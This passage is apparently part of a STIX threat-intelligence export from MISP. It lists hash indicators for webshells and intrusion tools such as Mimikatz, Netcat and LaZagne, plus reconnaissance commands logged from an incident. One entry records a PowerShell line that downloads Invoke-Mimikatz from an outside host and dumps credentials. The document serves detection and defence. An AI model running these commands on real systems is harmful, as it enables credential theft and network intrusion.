"description": "ASPX webshell\r\n",
|
|
"pattern": "[file:hashes.MD5 = '523aa999b9270b382968e5c24ab6f9eb' AND file:name = 'Report_21.jpg']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--c4fc319e-0659-4a8a-8cbb-18b2eba56ac1",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:32.000Z",
|
|
"modified": "2022-10-05T09:35:32.000Z",
|
|
"description": "ASPXSpy webshell",
|
|
"pattern": "[file:hashes.MD5 = '45d854e66631e5c1cda6dbf4fea074ce' AND file:name = 'aspxspy2014final.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--f41e258b-608d-49e7-b38b-df2321e2fe0d",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:32.000Z",
|
|
"modified": "2022-10-05T09:35:32.000Z",
|
|
"description": "Sec4ever webshell\r\n",
|
|
"pattern": "[file:hashes.MD5 = 'bb767354ee886f69b4ab4f9b4ac6b660' AND file:name = 'sec4ever.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--c0ec7d82-7d12-42dc-aeca-0a21eabe33c9",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:32.000Z",
|
|
"modified": "2022-10-05T09:35:32.000Z",
|
|
"description": "basic ASPX webshell",
|
|
"pattern": "[file:hashes.MD5 = '0152de452f92423829e041af2d783e3f' AND file:name = 'editor.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--1045be6d-0c9d-4997-a98d-47f5d32951e0",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:32.000Z",
|
|
"modified": "2022-10-05T09:35:32.000Z",
|
|
"description": "devilzshell webshell\r\n",
|
|
"pattern": "[file:hashes.MD5 = '7981f1bf9b8e5f4691e4ac440f1ba251' AND file:name = 'devilzshell.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--78aeb5df-c2ab-48b7-86f9-9c9c7b19e2eb",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:32.000Z",
|
|
"modified": "2022-10-05T09:35:32.000Z",
|
|
"description": "Nightrunner webshell",
|
|
"pattern": "[file:hashes.MD5 = '4b646e7958e1bb00924b8e6598fe6670' AND file:name = 'nightrunner.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--85e8cf0d-dafa-40cc-a12c-888b92dd5b85",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:32.000Z",
|
|
"modified": "2022-10-05T09:35:32.000Z",
|
|
"description": "PHP webshell\r\n",
|
|
"pattern": "[file:hashes.MD5 = 'd608163a972f43cc9f53705ed6d31089' AND file:name = 'mini.php']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--053265c5-7ab7-40e2-a284-9cb688db0db7",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T10:03:17.000Z",
|
|
"modified": "2022-10-05T10:03:17.000Z",
|
|
"description": "Netcat",
|
|
"pattern": "[file:hashes.MD5 = '7567f938ee1074cd3932fdb01088ca35' AND file:name = '50.exe' AND file:name = '04.exe' AND file:name = 'putty.exe']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T10:03:17Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"misp-galaxy:tool=\"Netcat\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--b56e1f1f-c63e-44f3-beed-7efc71b29f0a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T10:04:51.000Z",
|
|
"modified": "2022-10-05T10:04:51.000Z",
|
|
"description": "Mimikatz",
|
|
"pattern": "[file:hashes.MD5 = '566b4858b29cfa48cd5584bebfc7546b' AND file:name = 'mim.ps1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T10:04:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"misp-galaxy:tool=\"Mimikatz\"",
|
|
"misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
|
|
"misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
|
|
"misp-galaxy:malpedia=\"MimiKatz\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--6e306200-9536-48d8-ba02-fb7bc6210e93",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T10:18:38.000Z",
|
|
"modified": "2022-10-05T10:18:38.000Z",
|
|
"pattern": "[file:hashes.MD5 = 'bd876b57f8be84ff5d95c899de34c0ee' AND file:name = 'Invoke-DCSync.ps1.txt']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T10:18:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--0c4e1b7d-9d9a-4fbd-979b-20b4e2a9656d",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T10:21:00.000Z",
|
|
"modified": "2022-10-05T10:21:00.000Z",
|
|
"description": "Mimikatz",
|
|
"pattern": "[file:hashes.MD5 = 'f575d4bb1f5ff6c54b2de99e9bc40c75' AND file:name = 'Aaa.txt' AND file:name = 'Aaa.ps1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T10:21:00Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"misp-galaxy:tool=\"Mimikatz\"",
|
|
"misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
|
|
"misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
|
|
"misp-galaxy:malpedia=\"MimiKatz\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--f3aa997e-9b85-4bea-b0ea-a3c25bfdf334",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T10:22:15.000Z",
|
|
"modified": "2022-10-05T10:22:15.000Z",
|
|
"pattern": "[file:hashes.MD5 = '238a4efe51a9340511788d2752aca8d6' AND file:name = 'DomainPasswordSpray.ps1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T10:22:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--94382d57-bf2b-4230-a0b4-5a4a13d61322",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T10:22:39.000Z",
|
|
"modified": "2022-10-05T10:22:39.000Z",
|
|
"pattern": "[file:hashes.MD5 = '550bd7c330795a766c9dfb1586f3cc53' AND file:name = 'Copy-VSS.ps1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T10:22:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--3290ec45-3315-4cd8-a44a-7b193b3c0e73",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T10:22:59.000Z",
|
|
"modified": "2022-10-05T10:22:59.000Z",
|
|
"pattern": "[file:hashes.MD5 = '68d3bf2c363144ec6874ab360fdda00a' AND file:name = 'lazagne.exe']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T10:22:59Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--e6d4afb9-8f17-4616-bf11-e2811c4027e4",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T10:24:18.000Z",
|
|
"modified": "2022-10-05T10:24:18.000Z",
|
|
"pattern": "[file:hashes.MD5 = '3437e3e59fda82cdb09eab711ba7389d' AND file:name = 'mimilove.exe']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T10:24:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--e77a5eb2-08b5-4318-a5f2-919b36810acf",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:07:18.000Z",
|
|
"modified": "2022-10-05T12:07:18.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c who\u0430mi",
|
|
"category": "Other",
|
|
"uuid": "277d50cc-e850-4b63-b260-400c9b283b9d"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Identify user privileges",
|
|
"category": "Other",
|
|
"uuid": "6dfee739-7b80-4f22-85d3-6de460b81f36"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--c0f056c7-8f46-459a-be27-b44adc75712f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:25:34.000Z",
|
|
"modified": "2022-10-05T12:25:34.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c \u0430ppcmd list site",
|
|
"category": "Other",
|
|
"uuid": "07efa145-5d14-40a1-9c0e-29fb14690d39"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "List the hosted websites on the web server",
|
|
"category": "Other",
|
|
"uuid": "cb6066d2-c039-45b3-b1d2-dbdccfe5bea1"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--335630e4-b15a-4580-ba4b-397949f9a27a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:26:34.000Z",
|
|
"modified": "2022-10-05T12:26:34.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c nlt\u0435st /domain_trusts",
|
|
"category": "Other",
|
|
"uuid": "f7f1f08d-1522-4969-bbaa-b7489ee98ee7"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "List domain controllers and enumerate domain trusts",
|
|
"category": "Other",
|
|
"uuid": "57bc304a-ea81-4622-bd5a-86e899e80891"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--a2155916-623b-49d9-95f3-0efa3b8c30b7",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:27:55.000Z",
|
|
"modified": "2022-10-05T12:27:55.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /\u0441 dir",
|
|
"category": "Other",
|
|
"uuid": "5910a1d8-6777-4fad-9b92-7fddb36eac52"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "List current directories and files",
|
|
"category": "Other",
|
|
"uuid": "bc3f3f48-f44e-419f-8931-ca483dc52321"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--115e07f7-3a2b-454a-9739-d258ea48c461",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:28:19.000Z",
|
|
"modified": "2022-10-05T12:28:19.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c n\u0435t view",
|
|
"category": "Other",
|
|
"uuid": "60aeca64-d8c6-495d-a52f-56e59ef9933c"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Display a list of domains, computers, or resources that are being shared by the specified computer",
|
|
"category": "Other",
|
|
"uuid": "462fe85e-02f8-4308-b071-2bf0c4e49a85"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--74aba723-d4a6-4ac1-aeef-1ecc3bce0e59",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:29:57.000Z",
|
|
"modified": "2022-10-05T12:29:57.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c s\u0435t",
|
|
"category": "Other",
|
|
"uuid": "b4ff81a8-6765-441c-af30-204fc717e001"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Display the current environment variable settings",
|
|
"category": "Other",
|
|
"uuid": "af5b5b03-4f95-4d50-8237-0d78117805c3"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--4244f8ac-02b4-4e7e-952a-2a5fc074f498",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:30:34.000Z",
|
|
"modified": "2022-10-05T12:30:34.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c syst\u0435minfo",
|
|
"category": "Other",
|
|
"uuid": "8521314a-ad8b-4d61-ae85-ceb07a685c04"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Display system profile and installed hotfixes",
|
|
"category": "Other",
|
|
"uuid": "c272d2d5-bc98-473d-b564-bb6da2a5d0a4"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--ce69179a-198c-4251-818b-738836cbc598",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:31:49.000Z",
|
|
"modified": "2022-10-05T12:31:49.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c ipconfig -displ\u0430ydns",
|
|
"category": "Other",
|
|
"uuid": "e0acd75a-6dd7-40ab-b069-672664f1e4b3"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Display DNS resolver cache",
|
|
"category": "Other",
|
|
"uuid": "a9f4402e-11f4-41db-9463-046d765d2a70"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--ce6570c7-2cf4-4b21-9d83-46553a2ffb96",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:32:10.000Z",
|
|
"modified": "2022-10-05T12:32:10.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c ipconfig -\u0430ll",
|
|
"category": "Other",
|
|
"uuid": "0135e480-afdf-4f34-a86e-16bc666432e5"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Display network configuration on all network interfaces",
|
|
"category": "Other",
|
|
"uuid": "87dd9202-d19b-41c5-ba44-13982f05d301"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--aad0eb86-0f69-43ad-8160-19fd3db38e7c",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:32:28.000Z",
|
|
"modified": "2022-10-05T12:32:28.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c n\u0435t user",
|
|
"category": "Other",
|
|
"uuid": "f3fcfea6-8d3a-4c19-86ab-0d4d6d7d826a"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Display local users",
|
|
"category": "Other",
|
|
"uuid": "0df6194b-000f-4f58-bdc3-5ceb727f28ca"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--b860e3a1-79ca-42bb-bc9e-8eeb0f6afd78",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:32:57.000Z",
|
|
"modified": "2022-10-05T12:32:57.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c n\u0435t user /domain",
|
|
"category": "Other",
|
|
"uuid": "64f25bb2-a69d-446f-bddf-e2203b0a97cc"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Display domain users",
|
|
"category": "Other",
|
|
"uuid": "65748b94-07c0-4c03-9d15-616156d3f224"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--ce6c6d09-48d0-4943-8373-e05933066fdd",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:33:17.000Z",
|
|
"modified": "2022-10-05T12:33:17.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c n\u0435t use",
|
|
"category": "Other",
|
|
"uuid": "2a24b94c-a7fb-40d8-a17a-5a81415a3a8f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Display mapped drives to local system",
|
|
"category": "Other",
|
|
"uuid": "654d92dc-d34c-4d77-9b01-7e40d39a7672"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--a7185faa-c1ad-404f-baa6-a05ecd72d479",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:33:37.000Z",
|
|
"modified": "2022-10-05T12:33:37.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c op\u0435nfil\u0435s",
|
|
"category": "Other",
|
|
"uuid": "09fa74e0-b6fa-4903-9e83-e26ffb4249d2"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Display files opened remotely",
|
|
"category": "Other",
|
|
"uuid": "de58858d-accd-46e3-87de-e1d69d793458"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--5a7223b0-b85e-42cb-a17e-648697e05301",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:38:38.000Z",
|
|
"modified": "2022-10-05T12:38:38.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "IEX (New-Object\r\nNet.WebClient).Downlo\u0430dString(\u201chtt\u0440s://raw.githubusercont\u0435n\r\nt.com/BC-\r\nSECURITY/Empire/master/data/module_source/cr\u0435dentials/Invok\r\ne-Mimikatz.ps1\u201d); Invoke-Mimik\u0430tz -Command\r\nprivil\u0435ge::d\u0435bug; Invoke-Mimik\u0430tz -DumpCr\u0435ds;",
|
|
"category": "Other",
|
|
"uuid": "f8f8b55c-73f8-4122-bfbb-c2fdf69aa8ba"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Decoded base64 command issued through webshell to invoke Mimikatz to dump passwords",
|
|
"category": "Other",
|
|
"uuid": "6702b1ce-b619-484f-8119-d22e05308b4d"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
